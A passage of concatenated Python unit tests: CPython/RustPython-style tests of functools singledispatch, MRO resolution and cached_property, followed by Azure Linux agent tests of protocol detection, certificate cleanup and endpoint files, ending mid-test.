self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with support.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
test_protocol_util.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import tempfile
import unittest
from errno import ENOENT
from threading import Thread
from azurelinuxagent.common.exception import ProtocolError, DhcpError, OSUtilError
from azurelinuxagent.common.protocol.goal_state import TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME
from azurelinuxagent.common.protocol.metadata_server_migration_util import _METADATA_PROTOCOL_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME
from azurelinuxagent.common.protocol.util import get_protocol_util, ProtocolUtil, PROTOCOL_FILE_NAME, \
WIRE_PROTOCOL_NAME, ENDPOINT_FILE_NAME
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from tests.tools import AgentTestCase, MagicMock, Mock, patch, clear_singleton_instances
@patch("time.sleep")
class TestProtocolUtil(AgentTestCase):
MDS_CERTIFICATES = [_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME, \
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME, \
_LEGACY_METADATA_SERVER_P7B_FILE_NAME]
WIRESERVER_CERTIFICATES = [TRANSPORT_CERT_FILE_NAME, TRANSPORT_PRV_FILE_NAME]
def setUp(self):
super(TestProtocolUtil, self).setUp()
# Since ProtocolUtil is a singleton per thread, we need to clear it to ensure that the test cases do not
# reuse a previous state
clear_singleton_instances(ProtocolUtil)
# Cleanup certificate files, protocol file, and endpoint files
def tearDown(self):
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
for path in [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
for path in [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]:
if os.path.exists(path):
os.remove(path)
protocol_path = os.path.join(dir, PROTOCOL_FILE_NAME)
if os.path.exists(protocol_path):
os.remove(protocol_path)
endpoint_path = os.path.join(dir, ENDPOINT_FILE_NAME)
if os.path.exists(endpoint_path):
os.remove(endpoint_path)
def test_get_protocol_util_should_return_same_object_for_same_thread(self, _):
protocol_util1 = get_protocol_util()
protocol_util2 = get_protocol_util()
self.assertEqual(protocol_util1, protocol_util2)
def test_get_protocol_util_should_return_different_object_for_different_thread(self, _):
protocol_util_instances = []
errors = []
def get_protocol_util_instance():
try:
protocol_util_instances.append(get_protocol_util())
except Exception as e: # pylint: disable=invalid-name
errors.append(e)
t1 = Thread(target=get_protocol_util_instance) # pylint: disable=invalid-name
t2 = Thread(target=get_protocol_util_instance) # pylint: disable=invalid-name
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(len(protocol_util_instances), 2, "Could not create the expected number of protocols. Errors: [{0}]".format(errors))
self.assertNotEqual(protocol_util_instances[0], protocol_util_instances[1], "The instances created by different threads should be different")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol(self, WireProtocol, _): # pylint: disable=invalid-name
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = "foo.bar"
# Test wire protocol is available
protocol = protocol_util.get_protocol()
self.assertEqual(WireProtocol.return_value, protocol)
# Test wire protocol is not available
protocol_util.clear_protocol()
WireProtocol.return_value.detect.side_effect = ProtocolError()
self.assertRaises(ProtocolError, protocol_util.get_protocol)
@patch("azurelinuxagent.common.conf.get_lib_dir")
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_detect_protocol_no_dhcp(self, WireProtocol, mock_get_lib_dir, _): # pylint: disable=invalid-name
WireProtocol.return_value.detect = Mock()
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.osutil.is_dhcp_available.return_value = False
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = None
protocol_util.dhcp_handler.run = Mock()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path() # pylint: disable=unused-variable,protected-access
# Test wire protocol when no endpoint file has been written
protocol_util._detect_protocol() # pylint: disable=protected-access
self.assertEqual(KNOWN_WIRESERVER_IP, protocol_util.get_wireserver_endpoint())
# Test wire protocol on dhcp failure
protocol_util.osutil.is_dhcp_available.return_value = True
protocol_util.dhcp_handler.run.side_effect = DhcpError()
self.assertRaises(ProtocolError, protocol_util._detect_protocol) # pylint: disable=protected-access
@patch("azurelinuxagent.common.protocol.util.WireProtocol")
def test_get_protocol(self, WireProtocol, _): # pylint: disable=invalid-name
WireProtocol.return_value = MagicMock()
protocol_util = get_protocol_util()
protocol_util.get_wireserver_endpoint = Mock()
protocol_util._detect_protocol = MagicMock() # pylint: disable=protected-access
protocol_util._save_protocol("WireProtocol") # pylint: disable=protected-access
protocol = protocol_util.get_protocol()
self.assertEqual(WireProtocol.return_value, protocol)
protocol_util.get_wireserver_endpoint.assert_any_call()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
def test_get_protocol_wireserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from WireServer to WireServer protocol
will clean up leftover MDS Certificates (from a previous Metadata Server to Wireserver
update, intermediate updated agent does not clean up MDS certificates) and reset firewall rules.
We don't test that WireServer certificates, protocol file, or endpoint file were created
because we already expect them to be created since we are updating from a WireServer agent.
"""
# Setup Protocol file with WireProtocol
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(filename, "w") as f: # pylint: disable=invalid-name
f.write(WIRE_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_metadataserver_to_wireserver_update_removes_metadataserver_artifacts(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that agent upgrade from MetadataServer to WireServer protocol
will clean up leftover MDS Certificates and reset firewall rules. Also check that
WireServer certificates are present, and protocol/endpoint files are written to appropriately.
"""
# Setup Protocol file with MetadataProtocol
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
protocol_filename = os.path.join(dir, PROTOCOL_FILE_NAME)
with open(protocol_filename, "w") as f: # pylint: disable=invalid-name
f.write(_METADATA_PROTOCOL_NAME)
# Setup MDS Certificates
mds_cert_paths = [os.path.join(dir, mds_cert) for mds_cert in TestProtocolUtil.MDS_CERTIFICATES]
for mds_cert_path in mds_cert_paths:
open(mds_cert_path, "w").close()
# Setup mocks
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check MDS Certs do not exist
for mds_cert_path in mds_cert_paths:
self.assertFalse(os.path.exists(mds_cert_path))
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules was reset
protocol_util.osutil.remove_firewall.assert_called_once()
protocol_util.osutil.enable_firewall.assert_called_once()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch('azurelinuxagent.common.conf.get_lib_dir')
@patch('azurelinuxagent.common.conf.enable_firewall')
@patch('azurelinuxagent.common.protocol.wire.WireClient')
def test_get_protocol_new_wireserver_agent_generates_certificates(self, mock_wire_client, mock_enable_firewall, mock_get_lib_dir, _):
"""
This is for testing that a new WireServer Linux Agent generates appropriate certificates,
protocol file, and endpoint file.
"""
# Setup mocks
dir = tempfile.gettempdir() # pylint: disable=redefined-builtin
mock_get_lib_dir.return_value = dir
mock_enable_firewall.return_value = True
protocol_util = get_protocol_util()
protocol_util.osutil = MagicMock()
mock_wire_client.return_value = MagicMock()
protocol_util.dhcp_handler = MagicMock()
protocol_util.dhcp_handler.endpoint = KNOWN_WIRESERVER_IP
# Run
protocol_util.get_protocol()
# Check that WireServer Certs exist
ws_cert_paths = [os.path.join(dir, ws_cert) for ws_cert in TestProtocolUtil.WIRESERVER_CERTIFICATES]
for ws_cert_path in ws_cert_paths:
self.assertTrue(os.path.isfile(ws_cert_path))
# Check firewall rules were not reset
protocol_util.osutil.remove_firewall.assert_not_called()
protocol_util.osutil.enable_firewall.assert_not_called()
# Check Protocol File is updated to WireProtocol
with open(os.path.join(dir, PROTOCOL_FILE_NAME), "r") as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), WIRE_PROTOCOL_NAME)
# Check Endpoint file is updated to WireServer IP
with open(os.path.join(dir, ENDPOINT_FILE_NAME), 'r') as f: # pylint: disable=invalid-name
self.assertEqual(f.read(), KNOWN_WIRESERVER_IP)
@patch("azurelinuxagent.common.protocol.util.fileutil")
@patch("azurelinuxagent.common.conf.get_lib_dir")
def test_endpoint_file_states(self, mock_get_lib_dir, mock_fileutil, _):
mock_get_lib_dir.return_value = self.tmp_dir
protocol_util = get_protocol_util()
endpoint_file = protocol_util._get_wireserver_endpoint_file_path() # pylint: disable=protected-access
# Test get endpoint for io error
mock_fileutil.read_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint when file not found
mock_fileutil.read_file.side_effect = IOError(ENOENT, 'File not found')
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test get endpoint for empty file
mock_fileutil.read_file.return_value = ""
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertEqual(ep, KNOWN_WIRESERVER_IP)
# Test set endpoint for io error
mock_fileutil.write_file.side_effect = IOError()
ep = protocol_util.get_wireserver_endpoint() # pylint: disable=invalid-name
self.assertRaises(OSUtilError, protocol_util._set_wireserver_endpoint, 'abc') # pylint: disable=protected-access
# Test clear endpoint for io error
with open(endpoint_file, "w+") as ep_fd:
ep_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util._clear_wireserver_endpoint() # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(endpoint_file, mock_remove.call_args_list[0][0][0])
# Test clear endpoint when file not found
with patch('os.remove') as mock_remove:
mock_remove = Mock(side_effect=IOError(ENOENT, 'File not found'))
protocol_util._clear_wireserver_endpoint() # pylint: disable=protected-access
mock_remove.assert_not_called()
def test_protocol_file_states(self, _):
protocol_util = get_protocol_util()
protocol_util._clear_wireserver_endpoint = Mock() # pylint: disable=protected-access
protocol_file = protocol_util._get_protocol_file_path() # pylint: disable=protected-access
# Test clear protocol for io error
with open(protocol_file, "w+") as proto_fd:
proto_fd.write("")
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count) # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
